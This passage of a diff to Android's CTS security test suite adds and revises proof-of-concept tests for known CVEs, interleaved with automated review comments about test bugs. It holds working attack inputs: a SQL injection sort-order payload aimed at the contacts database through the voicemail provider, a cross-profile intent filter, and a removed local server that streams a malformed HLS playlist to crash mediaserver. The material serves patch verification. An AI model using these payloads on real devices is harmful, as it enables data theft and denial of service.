+ IntentFilter intentFilter = new IntentFilter("android.security.cts.CVE_2021_0327.OTHER_USER_ACTIVITY");
+ //IntentFilter intentFilter = new IntentFilter("android.security.cts.CVE_2021_0327$OTHER_USER_ACTIVITY");
+ intentFilter.addCategory(Intent.CATEGORY_DEFAULT);
+ ComponentName admin = new ComponentName(this, AdminReceiver.class);
+ manager.addCrossProfileIntentFilter(
+ admin,
+ intentFilter,
+ DevicePolicyManager.FLAG_MANAGED_CAN_ACCESS_PARENT
+ );
+ manager.setProfileEnabled(admin);
+
+ setResult(RESULT_OK);
+ finish();
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0339.java b/tests/tests/security/src/android/security/cts/CVE_2021_0339.java
index 5ace5df5f08..a59d749772c 100644
--- a/tests/tests/security/src/android/security/cts/CVE_2021_0339.java
+++ b/tests/tests/security/src/android/security/cts/CVE_2021_0339.java
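Review bot: Two commented-out `//IntentFilter intentFilter = …` lines are left around the live one in ProvisionedActivity.onCreate(), one of them naming an unrelated `com.example.clearedshell` action; they should be deleted before this lands. The action string `"android.security.cts.CVE_2021_0327.OTHER_USER_ACTIVITY"` is also spelled out in IntroActivity.canLaunchOtherUserActivity(), so a shared constant would keep the two from drifting apart. A one-line comment above `addCrossProfileIntentFilter` stating that the filter deliberately lets the managed profile reach the parent profile for this test would help the next reader.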
@@ -17,98 +17,126 @@ package android.security.cts; import static org.junit.Assert.assertThat; -import static org.hamcrest.Matchers.lessThan; +import static org.junit.Assume.assumeThat; +import static org.hamcrest.Matchers.*; -import android.test.AndroidTestCase; import android.app.Activity; import android.content.Context; import android.content.Intent; -import android.platform.test.annotations.SecurityTest; +import android.os.Bundle; +import android.os.RemoteCallback; import android.os.SystemClock; +import android.platform.test.annotations.SecurityTest; +import android.test.AndroidTestCase; +import android.util.Log; import androidx.test.InstrumentationRegistry; import androidx.test.runner.AndroidJUnit4; -import android.util.Log; import org.junit.Test; import org.junit.runner.RunWith; +import java.util.concurrent.CompletableFuture; +import java.util.concurrent.TimeUnit; + @SecurityTest @RunWith(AndroidJUnit4.class) public class CVE_2021_0339 { static final String TAG = CVE_2021_0339.class.getSimpleName(); private static final String SECURITY_CTS_PACKAGE_NAME = "android.security.cts"; + private static final String CALLBACK_KEY = "testactivitycallback"; + private static final String RESULT_KEY = "testactivityresult"; + static final int DURATION_RESULT_CODE = 1; static final int MAX_TRANSITION_DURATION_MS = 3000; // internal max static final int TIME_MEASUREMENT_DELAY_MS = 5000; // tolerance for lag. - public static boolean testCompleted; - - public FirstActivity fActivity; - public SecondActivity sActivity; - private void launchActivity(Class<? extends Activity> clazz) { + private void launchActivity(Class<? 
extends Activity> clazz, RemoteCallback cb) { final Context context = InstrumentationRegistry.getInstrumentation().getContext(); final Intent intent = new Intent(Intent.ACTION_MAIN); intent.setClassName(SECURITY_CTS_PACKAGE_NAME, clazz.getName()); intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK); + intent.putExtra(CALLBACK_KEY, cb); context.startActivity(intent); } /** * b/175817167 + * start the first activity and get the result from the remote callback */ @Test @SecurityTest public void testPocCVE_2021_0339() throws Exception { + CompletableFuture<Integer> callbackReturn = new CompletableFuture<>(); + RemoteCallback cb = new RemoteCallback((Bundle result) -> + callbackReturn.complete(result.getInt(RESULT_KEY))); + launchActivity(FirstActivity.class, cb); // start activity with callback as intent extra - Log.d(TAG, "test start"); - testCompleted = false; - launchActivity(FirstActivity.class); + // blocking while the remotecallback is unset + int duration = callbackReturn.get(15, TimeUnit.SECONDS); - //wait for SecondActivity animation to complete - synchronized(CVE_2021_0339.class){ - if(!testCompleted) - CVE_2021_0339.class.wait(); - } - Log.d(TAG, "test completed"); - - //A duration of a transition from "FirstActivity" to "Second Activity" - //is set in this test to 10 seconds - // (res/anim/translate1.xml and res/anim/translate2.xml) - //The fix is supposed to limit the duration to 3000 ms. - // testing for > 8s - assertThat(SecondActivity.duration, - lessThan(MAX_TRANSITION_DURATION_MS + TIME_MEASUREMENT_DELAY_MS)); + // if we couldn't get the duration of secondactivity in firstactivity, the default is -1 + assumeThat(duration, not(equals(-1))); + + // the max duration after the fix is 3 seconds. 
+ // we check to see that the total duration was less than 8 seconds after accounting for lag + assertThat(duration, + lessThan(MAX_TRANSITION_DURATION_MS + TIME_MEASUREMENT_DELAY_MS)); } + /** + * create an activity so that the second activity has something to animate from + * start the second activity and get the result + * return the result from the second activity in the remotecallback + */ public static class FirstActivity extends Activity { + private RemoteCallback cb; - @Override - public void onEnterAnimationComplete() { - super.onEnterAnimationComplete(); - Intent intent = new Intent(this, SecondActivity.class); - intent.putExtra("STARTED_TIMESTAMP", SystemClock.uptimeMillis()); - startActivity(intent); - overridePendingTransition(R.anim.translate2,R.anim.translate1); - Log.d(TAG,this.getLocalClassName()+" onEnterAnimationComplete()"); - } + @Override + public void onCreate(Bundle bundle) { + super.onCreate(bundle); + cb = (RemoteCallback) getIntent().getExtras().get(CALLBACK_KEY); + } + + @Override + public void onEnterAnimationComplete() { + super.onEnterAnimationComplete(); + Intent intent = new Intent(this, SecondActivity.class); + intent.putExtra("STARTED_TIMESTAMP", SystemClock.uptimeMillis()); + startActivityForResult(intent, DURATION_RESULT_CODE); + overridePendingTransition(R.anim.translate2,R.anim.translate1); + Log.d(TAG,this.getLocalClassName()+" onEnterAnimationComplete()"); + } + + @Override + protected void onActivityResult(int requestCode,int resultCode, Intent data) { + super.onActivityResult(requestCode, resultCode, data); + if (requestCode == DURATION_RESULT_CODE && resultCode == RESULT_OK) { + // this is the result that we requested + int duration = data.getIntExtra("duration", -1); // get result from secondactivity + Bundle res = new Bundle(); + res.putInt(RESULT_KEY, duration); + finish(); + cb.sendResult(res); // update callback in test + } + } } + /** + * measure time since secondactivity start to secondactivity animation complete + 
* return the duration in the result + */ public static class SecondActivity extends Activity{ - public static int duration = 0; - - @Override - public void onEnterAnimationComplete() { - super.onEnterAnimationComplete(); - long completedTs = SystemClock.uptimeMillis(); - long startedTs = getIntent().getLongExtra("STARTED_TIMESTAMP", 0); - duration = (int)(completedTs - startedTs); - Log.d(TAG, this.getLocalClassName() - + " onEnterAnimationComplete() duration=" + Long.toString(duration)); - - //Notify main thread that the test is completed - synchronized(CVE_2021_0339.class){ - CVE_2021_0339.testCompleted = true; - CVE_2021_0339.class.notifyAll(); + @Override + public void onEnterAnimationComplete() { + super.onEnterAnimationComplete(); + long completedTs = SystemClock.uptimeMillis(); + long startedTs = getIntent().getLongExtra("STARTED_TIMESTAMP", 0); + int duration = (int)(completedTs - startedTs); + Log.d(TAG, this.getLocalClassName() + + " onEnterAnimationComplete() duration=" + Long.toString(duration)); + Intent durationIntent = new Intent(); + durationIntent.putExtra("duration", duration); + setResult(RESULT_OK, durationIntent); // set result for firstactivity + finish(); // firstactivity only gets the result when we finish } - } } } diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0394.java b/tests/tests/security/src/android/security/cts/CVE_2021_0394.java new file mode 100644 index 00000000000..d3278ee1252 --- /dev/null +++ b/tests/tests/security/src/android/security/cts/CVE_2021_0394.java 
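Review bot: In testPocCVE_2021_0339 the guard `assumeThat(duration, not(equals(-1)));` does not compare against -1: the Hamcrest matcher is `equalTo`, and an unqualified `equals(-1)` inside an instance method resolves to `Object.equals` on the test object, which returns false, so the matcher becomes "not equal to false" and appears to hold for every integer. A duration of -1, the default when FirstActivity gets no value from SecondActivity, then falls through to `assertThat(duration, lessThan(...))` and passes, reporting the device as fixed without a measurement. The line should read `assumeThat(duration, not(equalTo(-1)));`. Separately, FirstActivity.onCreate() dereferences `getIntent().getExtras()` without a null check.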
@@ -0,0 +1,42 @@ +/** + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import static org.junit.Assert.assertFalse; + +import android.platform.test.annotations.SecurityTest; +import org.junit.Test; +import org.junit.runner.RunWith; +import androidx.test.runner.AndroidJUnit4; + +@RunWith(AndroidJUnit4.class) +public class CVE_2021_0394 { + static { + System.loadLibrary("ctssecurity_jni"); + } + + /** + * b/172655291 + */ + @SecurityTest(minPatchLevel = "2021-03") + @Test + public void testPocCVE_2021_0394() throws Exception { + assertFalse(poc()); + } + + public static native boolean poc(); +} diff --git a/tests/tests/security/src/android/security/cts/CertificateData.java b/tests/tests/security/src/android/security/cts/CertificateData.java index 0b4780f9702..118b40fb0d9 100644 --- a/tests/tests/security/src/android/security/cts/CertificateData.java +++ b/tests/tests/security/src/android/security/cts/CertificateData.java @@ -17,14 +17,12 @@ */ package android.security.cts; -import android.platform.test.annotations.SecurityTest; /** * Run "./cts/tools/utils/java-cert-list-generator.sh > * cts/tests/tests/security/src/android/security/cts/CertificateData.java" * to generate this file. */ -@SecurityTest class CertificateData { static final String[] CERTIFICATE_DATA = { "91:C6:D6:EE:3E:8A:C8:63:84:E5:48:C2:99:29:5C:75:6C:81:7B:81", 
diff --git a/tests/tests/security/src/android/security/cts/CertificateTest.java b/tests/tests/security/src/android/security/cts/CertificateTest.java index 2d889889f98..7b1ed9dacb8 100644 --- a/tests/tests/security/src/android/security/cts/CertificateTest.java +++ b/tests/tests/security/src/android/security/cts/CertificateTest.java @@ -20,7 +20,6 @@ import java.io.File; import java.io.FileInputStream; import java.io.IOException; import android.content.pm.PackageManager; -import android.platform.test.annotations.SecurityTest; import android.test.AndroidTestCase; import java.security.KeyStore; import java.security.KeyStoreException; @@ -37,7 +36,6 @@ import java.util.HashSet; import java.util.List; import java.util.Set; -@SecurityTest public class CertificateTest extends AndroidTestCase { // The directory for CA root certificates trusted by WFA (WiFi Alliance) private static final String DIR_OF_CACERTS_FOR_WFA = diff --git a/tests/tests/security/src/android/security/cts/PackageSignatureTest.java b/tests/tests/security/src/android/security/cts/PackageSignatureTest.java index 3aec3942631..c5234d614f6 100644 --- a/tests/tests/security/src/android/security/cts/PackageSignatureTest.java +++ b/tests/tests/security/src/android/security/cts/PackageSignatureTest.java @@ -148,7 +148,10 @@ public class PackageSignatureTest extends AndroidTestCase { "com.android.apex.cts.shim", // Oom Catcher package to prevent tests from ooming device. - "com.android.cts.oomcatcher" + "com.android.cts.oomcatcher", + + // Collects device info at the start of the test + "com.android.compatibility.common.deviceinfo" )); diff --git a/tests/tests/security/src/android/security/cts/SQLiteTest.java b/tests/tests/security/src/android/security/cts/SQLiteTest.java new file mode 100644 index 00000000000..47407ca6222 --- /dev/null +++ b/tests/tests/security/src/android/security/cts/SQLiteTest.java 
@@ -0,0 +1,81 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.content.Context; +import android.content.ContentResolver; +import android.content.Intent; +import android.content.pm.PackageManager.NameNotFoundException; +import android.net.Uri; +import android.platform.test.annotations.SecurityTest; +import android.provider.VoicemailContract; +import android.test.AndroidTestCase; +import androidx.test.InstrumentationRegistry; +import static org.junit.Assert.*; + +@SecurityTest +public class SQLiteTest extends AndroidTestCase { + + private ContentResolver mResolver; + private String mPackageName; + private Context mContext; + + @Override + protected void setUp() throws Exception { + super.setUp(); + mResolver = getContext().getContentResolver(); + mContext = InstrumentationRegistry.getTargetContext(); + mPackageName = mContext.getPackageName(); + } + + /** + * b/139186193 + */ + @SecurityTest(minPatchLevel = "2019-11") + public void test_android_cve_2019_2195() { + Uri uri = VoicemailContract.Voicemails.CONTENT_URI; + uri = uri.buildUpon().appendQueryParameter("source_package", mPackageName).build(); + + try { + mContext.grantUriPermission(mPackageName, uri, + Intent.FLAG_GRANT_READ_URI_PERMISSION | Intent.FLAG_GRANT_WRITE_URI_PERMISSION + | Intent.FLAG_GRANT_PERSISTABLE_URI_PERMISSION); + } catch (Exception e) { + if (e instanceof 
java.lang.SecurityException) { + // this suggests com.android.providers.contacts.VoicemailContentProvider + // does not allow granting of Uri permissions, hence return. + return; + } + } + + try { + String fileToDump = mContext.createPackageContext("com.android.providers.contacts", 0) + .getDatabasePath("contacts2.db").getAbsolutePath(); + try { + mResolver.query(uri, null, null, null, + "_id ASC LIMIT _TOKENIZE('calls(_data,_data,_data,source_package,type) VALUES(''" + + fileToDump + "'',?,?,''" + mPackageName + "'',4);',0,'','Z')") + .close(); + fail("Vulnerable function exists"); + } catch (android.database.sqlite.SQLiteException e) { + // do nothing + } + } catch (NameNotFoundException n) { + // do nothing + } + } +} diff --git a/tests/tests/security/src/android/security/cts/StagefrightTest.java b/tests/tests/security/src/android/security/cts/StagefrightTest.java index 949d4ced1fc..a2d5ccd9cab 100644 --- a/tests/tests/security/src/android/security/cts/StagefrightTest.java +++ b/tests/tests/security/src/android/security/cts/StagefrightTest.java 
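Review bot: In test_android_cve_2019_2195 the first `catch (Exception e)` acts only on `SecurityException` and silently drops everything else, and the outer `catch (NameNotFoundException n)` is empty, so when `com.android.providers.contacts` cannot be resolved the test passes without having queried anything. I would narrow the first handler to `catch (SecurityException e) { return; }` and at least log in the NameNotFoundException handler, so that a pass always means the query was rejected. `mResolver.query(...)` can also return null, in which case `.close()` throws a NullPointerException instead of reaching `fail(...)`.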
@@ -1146,91 +1146,6 @@ public class StagefrightTest { @Test @SecurityTest(minPatchLevel = "2018-04") - public void testStagefright_cve_2017_13279() throws Exception { - Thread server = new Thread() { - @Override - public void run(){ - try (ServerSocket serverSocket = new ServerSocket(8080) { - {setSoTimeout(10_000);} // time out after 10 seconds - }; - Socket conn = serverSocket.accept() - ) { - OutputStream stream = conn.getOutputStream(); - byte http[] = ("HTTP/1.0 200 OK\r\nContent-Type: application/x-mpegURL\r\n\r\n" - + "#EXTM3U\n#EXT-X-STREAM-INF:\n").getBytes(); - stream.write(http); - while(!conn.isClosed()) - stream.write(("a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - 
+ "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\n").getBytes()); - } - catch(IOException e){ - } - } - }; - server.start(); - String uri = "http://127.0.0.1:8080/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" - + "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/" - + "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.m3u8"; - final MediaPlayerCrashListener mpcl = new MediaPlayerCrashListener(); - - LooperThread t = new LooperThread(new Runnable() { - @Override - public void run() { - - MediaPlayer mp = new MediaPlayer(); - mp.setOnErrorListener(mpcl); - mp.setOnPreparedListener(mpcl); - mp.setOnCompletionListener(mpcl); - RenderTarget renderTarget = RenderTarget.create(); - Surface surface = renderTarget.getSurface(); - mp.setSurface(surface); - AssetFileDescriptor fd = null; - try { - mp.setDataSource(uri); - mp.prepareAsync(); - } catch (IOException e) { - Log.e(TAG, e.toString()); - } finally { - closeQuietly(fd); - } - - Looper.loop(); - mp.release(); - } - }); - t.start(); - Thread.sleep(60000); // Poc takes a while to crash mediaserver, waitForError - // doesn't wait long enough - assertFalse("Device *IS* vulnerable to CVE-2017-13279", - mpcl.waitForError() == MediaPlayer.MEDIA_ERROR_SERVER_DIED); - t.stopLooper(); - t.join(); // wait for thread to exit so we're sure the player was released - server.join(); - } - - @Test - @SecurityTest(minPatchLevel = "2018-04") public void testStagefright_cve_2017_13276() throws Exception { doStagefrightTest(R.raw.cve_2017_13276); } 
@@ -1259,6 +1174,18 @@ public class StagefrightTest { ***********************************************************/ @Test + @SecurityTest(minPatchLevel = "2019-04") + public void testStagefright_cve_2019_2245() throws Exception { + doStagefrightTest(R.raw.cve_2019_2245); + } + + @Test + @SecurityTest(minPatchLevel = "2019-04") + public void testStagefright_cve_2018_13925() throws Exception { + doStagefrightTest(R.raw.cve_2018_13925); + } + + @Test @SecurityTest(minPatchLevel = "2020-12") public void testStagefright_cve_2020_11139() throws Exception { doStagefrightTest(R.raw.cve_2020_11139); @@ -1934,7 +1861,9 @@ public class StagefrightTest { Thread.sleep(CHECK_INTERVAL); timeout -= CHECK_INTERVAL; } + if (!reportFile.exists() || !reportFile.isFile() || !lockFile.exists()) { + Log.e(TAG, "couldn't get the report or lock file"); return null; } try (BufferedReader reader = new BufferedReader(new FileReader(reportFile))) { @@ -1999,7 +1928,9 @@ public class StagefrightTest { if (what != MediaPlayer.MEDIA_ERROR_SERVER_DIED) { what = newWhat; } + lock.lock(); + errored = true; condition.signal(); lock.unlock(); 
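Review bot: In the `@@ -1999` hunk the new `errored = true;` is written under `lock`, but the `what = newWhat;` assignment just above it still runs before `lock.lock()`, so the two fields `waitForError()` reads are not updated together. `what` is a plain `int` that `waitForError()` reads after `lock.unlock()`, so a later error callback's write has no ordering guarantee with respect to that read. Moving the `if (what != MediaPlayer.MEDIA_ERROR_SERVER_DIED) { what = newWhat; }` block to just after `lock.lock();` would publish both fields under the same lock. The enclosing callback starts and ends outside the hunk, so its other paths could not be checked.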
@@ -2022,17 +1953,19 @@ public class StagefrightTest { public int waitForError() throws InterruptedException { lock.lock(); - if (condition.awaitNanos(TIMEOUT_NS) <= 0) { - Log.d(TAG, "timed out on waiting for error"); + if (!errored && !completed) { + if (condition.awaitNanos(TIMEOUT_NS) <= 0) { + Log.d(TAG, "timed out on waiting for error. " + + "errored: " + errored + ", completed: " + completed); + } } lock.unlock(); - if (what != 0) { + if (what == MediaPlayer.MEDIA_ERROR_SERVER_DIED) { // Sometimes mediaserver signals a decoding error first, and *then* crashes // due to additional in-flight buffers being processed, so wait a little // and see if more errors show up. + Log.e(TAG, "couldn't get media crash yet, waiting 1 second"); SystemClock.sleep(1000); - } - if (what == MediaPlayer.MEDIA_ERROR_SERVER_DIED) { JSONArray crashes = getCrashReport(name.getMethodName(), 5000); if (crashes == null) { Log.e(TAG, "Crash results not found for test " + name.getMethodName()); @@ -2045,8 +1978,8 @@ public class StagefrightTest { // 0 is the code for no error. return 0; } - } + Log.d(TAG, "waitForError finished with no errors."); return what; } @@ -2063,6 +1996,7 @@ public class StagefrightTest { Condition condition = lock.newCondition(); int what; boolean completed = false; + boolean errored = false; } class LooperThread extends Thread { diff --git a/tests/tests/textclassifier/Android.bp b/tests/tests/textclassifier/Android.bp index ffd193fda7c..8ba2eb973fc 100644 --- a/tests/tests/textclassifier/Android.bp +++ b/tests/tests/textclassifier/Android.bp @@ -22,7 +22,7 @@ android_test { "cts", "vts10", "general-tests", - "mts" + "mts-extservices" ], libs: ["android.test.base.stubs"], static_libs: [ diff --git a/tests/tests/util/Android.bp b/tests/tests/util/Android.bp index 9ed5826d719..c7d5d8dfa31 100644 --- a/tests/tests/util/Android.bp +++ b/tests/tests/util/Android.bp 
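Review bot: In `waitForError()` the `SystemClock.sleep(1000)` now runs only when `what` is already `MEDIA_ERROR_SERVER_DIED`, so the case the retained comment describes, a decoding error first and the crash afterwards, is no longer waited for. Once the first error sets `errored`, the method appears to return the non-fatal code at once, so a test asserting that the result is not `MEDIA_ERROR_SERVER_DIED` could pass on a device whose mediaserver dies a moment later. If the grace period is still wanted, keep it for other errors ahead of the check, e.g. `if (what != 0 && what != MediaPlayer.MEDIA_ERROR_SERVER_DIED) { SystemClock.sleep(1000); }`; otherwise rewrite the comment to match. The added `Log.e(TAG, "couldn't get media crash yet, waiting 1 second")` is also misleading in the branch where the crash has already been reported. The method continues into the `@@ -2045` hunk, and part of its body lies between the two hunks and is not visible.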
@@ -20,7 +20,7 @@ android_test { "cts", "vts10", "general-tests", - "mts", + "mts-statsd", ], libs: ["android.test.runner.stubs"], static_libs: [ diff --git a/tests/tests/wifi/Android.bp b/tests/tests/wifi/Android.bp index 38a990f7cb1..06b6234a830 100644 --- a/tests/tests/wifi/Android.bp +++ b/tests/tests/wifi/Android.bp @@ -39,7 +39,8 @@ android_test { "cts", "vts10", "general-tests", - "mts", + "mts-tethering", + "mts-wifi", "sts", ], diff --git a/tests/tests/wifi/src/android/net/wifi/cts/WifiInfoTest.java b/tests/tests/wifi/src/android/net/wifi/cts/WifiInfoTest.java index 22124eb3114..643f42d709d 100644 --- a/tests/tests/wifi/src/android/net/wifi/cts/WifiInfoTest.java +++ b/tests/tests/wifi/src/android/net/wifi/cts/WifiInfoTest.java @@ -233,7 +233,7 @@ public class WifiInfoTest extends WifiJUnit3TestBase { .build(); // different instances - assertThat(info1).isNotSameAs(info2); + assertThat(info1).isNotSameInstanceAs(info2); // assert that info1 didn't change assertThat(info1.getSSID()).isEqualTo("\"" + TEST_SSID + "\""); |